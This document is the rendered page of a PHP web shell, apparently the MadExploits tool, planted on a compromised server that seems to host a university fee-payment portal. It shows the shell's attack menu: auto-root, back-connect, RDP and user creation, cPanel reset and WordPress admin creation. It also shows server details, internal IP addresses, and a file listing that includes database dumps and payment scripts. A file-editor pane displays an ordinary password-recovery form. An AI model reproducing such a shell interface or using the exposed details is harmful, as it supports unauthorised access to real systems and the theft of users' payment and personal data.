Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
fees-old /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
CSS
[ DIR ]
drwxr-xr-x
alumni-form-ag
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
css-ag
[ DIR ]
drwxr-xr-x
hosted_php
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
student
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
Checksum.php
642
B
-rw-r--r--
FailedTRAN.php
4.85
KB
-rw-r--r--
ForgetPassword.php
1.87
KB
-rw-r--r--
ForgetPasswordPage.php
3.34
KB
-rw-r--r--
GetHandleRES.php
10.87
KB
-rw-r--r--
Index.html
11.28
KB
-rw-r--r--
Reciept.disabledphp
5.1
KB
-rw-r--r--
Reciept.php
5.1
KB
-rw-r--r--
SendPerformREQ.php
9.45
KB
-rw-r--r--
StatusTRAN.php
5.24
KB
-rw-r--r--
StatusTRANold.php
6.09
KB
-rw-r--r--
account.php
3.11
KB
-rw-r--r--
ack.php
7.08
KB
-rw-r--r--
billdesk.disabledphp
1.86
KB
-rw-r--r--
calendar.css
2.65
KB
-rw-r--r--
calendar.js
16.85
KB
-rw-r--r--
calendar_form.php
18.27
KB
-rw-r--r--
corner-bottomleft.jpg
334
B
-rw-r--r--
corner-bottomright.jpg
341
B
-rw-r--r--
corner-topleft.jpg
335
B
-rw-r--r--
corner-topright.jpg
348
B
-rw-r--r--
database.php
2.3
KB
-rw-r--r--
donatebilldesk.php
2.6
KB
-rw-r--r--
donatehdfc.php
11.19
KB
-rw-r--r--
donationmail.php
5.94
KB
-rw-r--r--
error_log
13.22
MB
-rw-r--r--
formvalidator.php
14.1
KB
-rw-r--r--
giveback.php
19.01
KB
-rw-r--r--
giveback_backup.php
10.46
KB
-rw-r--r--
giveback_beforeeditedbyankit.p...
19.09
KB
-rw-r--r--
history.php
1.9
KB
-rw-r--r--
home.html
1.04
KB
-rw-r--r--
index.php
22.04
KB
-rw-r--r--
index1032015.php
22.05
KB
-rw-r--r--
indexb.php
22.97
KB
-rw-r--r--
indexold.php
23.13
KB
-rw-r--r--
jquery-latest.js
166.11
KB
-rw-r--r--
jquery.js
76.54
KB
-rw-r--r--
login.html
780
B
-rw-r--r--
logo.jpg
9.63
KB
-rw-r--r--
misp.html
14.15
KB
-rw-r--r--
misp.php
12.61
KB
-rw-r--r--
newstudent.php
9.72
KB
-rw-r--r--
pay.php
2.45
KB
-rw-r--r--
paymenthistory.php
1.94
KB
-rw-r--r--
phdcheckstatus.php
1.07
KB
-rw-r--r--
recounsiliation.php
6.15
KB
-rw-r--r--
register.php
2.47
KB
-rw-r--r--
register1.php
2.36
KB
-rw-r--r--
register_workshop.php
7.78
KB
-rw-r--r--
student.php
9.73
KB
-rw-r--r--
submittobill.php
551
B
-rw-r--r--
test.html
2.14
KB
-rw-r--r--
test.php
768
B
-rw-r--r--
thanks.php
4.42
KB
-rw-r--r--
user.php
4.84
KB
-rw-r--r--
userlist.php
472
B
-rw-r--r--
vendor.php
10.63
KB
-rw-r--r--
vendorold.php
9.86
KB
-rw-r--r--
wanted_sql_file.sql
2.33
MB
-rw-r--r--
webiiit_pg.sql
1.42
MB
-rw-r--r--
welcome.backup.php
18.06
KB
-rw-r--r--
welcome.php
23.38
KB
-rw-r--r--
welcome.txt
23.38
KB
-rw-r--r--
welcome1032015.php
23.37
KB
-rw-r--r--
welcomebill.php
5.29
KB
-rw-r--r--
welcomehdfc.php
5.8
KB
-rw-r--r--
welcomeold.php
14.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ForgetPasswordPage.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>IIIT Delhi Payment Portal| Password Recovery</title> <script type="text/javascript"> function validateForm(form, formParams) { for(var fieldName in formParams) { var preFilledValue = formParams[fieldName][0]; var errorMessage = formParams[fieldName][1]; var elem = document.getElementsByName(fieldName)[0]; if(elem.type=='radio'){ var radioLength = document.getElementsByName(fieldName).length; var anyChecked= false; for(var i = 0; i < radioLength; i++) { var radioElem = document.getElementsByName(fieldName)[i]; if(radioElem.checked) { anyChecked=true; break; } } if(anyChecked==false){ alert(errorMessage); if(elem.type!='hidden') elem.focus(); return false; } } var providedValue = elem.value.replace(/^\s+|\s+$/g,""); if(fieldName=='txtEmail'){ if(!validate_email(providedValue)){ alert("Not a valid e-mail address! Try Again"); elem.focus(); return false; } } if(fieldName=='Mobile'){ if(!isNumeric(providedValue) || providedValue.length < 9){ alert("Please provide a valid Mobile Number"); elem.focus(); return false; } } } var checkElem = document.getElementsByName("check1")[0]; if (checkElem.checked == false ) { alert("Please Agree to the Terms of Use to Continue"); checkElem.focus(); return false; } return true; } function validate_email(email) { if (/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(email)) { return true; } return false; } function isNumeric(value) { var numericExpression = /^[0-9]+$/; if(value.match(numericExpression)) { return true; } return false; } function isAlpha(value) { var alphaExpression = /^[(a-z)|(A-Z)| ]+$/; if(value.match(alphaExpression)) { return true; } return false; } function fieldSet(obj,str) { if(obj.value == str) { obj.value = ''; } } function fieldReset(obj,str) { if(obj.value == '') { obj.value = str; } } </script> <script type="text/javascript"> var formParams= new Array(); formParams["Mobile"]=new Array(); formParams["Mobile"][0]=""; formParams["Mobile"][1]="Please provide mobile"; formParams["txtEmail"]=new Array(); formParams["txtEmail"][0]=""; formParams["txtEmail"][1]="Please provide email id"; </script> </head> <body bgcolor="#f2f5fc"> <div class="container" align="center"><br /> <div align="center"><img src="logo.jpg" align="absmiddle"><br /><br /> <form name="form1" method="post" action="ForgetPassword.php" onSubmit="return validateForm(this, formParams);"> <table width="500" border="0" align="center"> <tr> <th colspan="2" scope="col">Get Password </th> </tr> <tr> <td>*Registered Email</td> <td> <input type="text" name="txtEmail"> </td> </tr><tr> <td>*Registered Mobile No:</td> <td> <input type="text" name="Mobile" maxlength="13"> </td> </tr> <tr><td>*Both is required to retrive your password</td> <td><input type="submit" name="Submit" value="Get Password"></td> </tr> </table> </form></div></div> </body> </html>
Close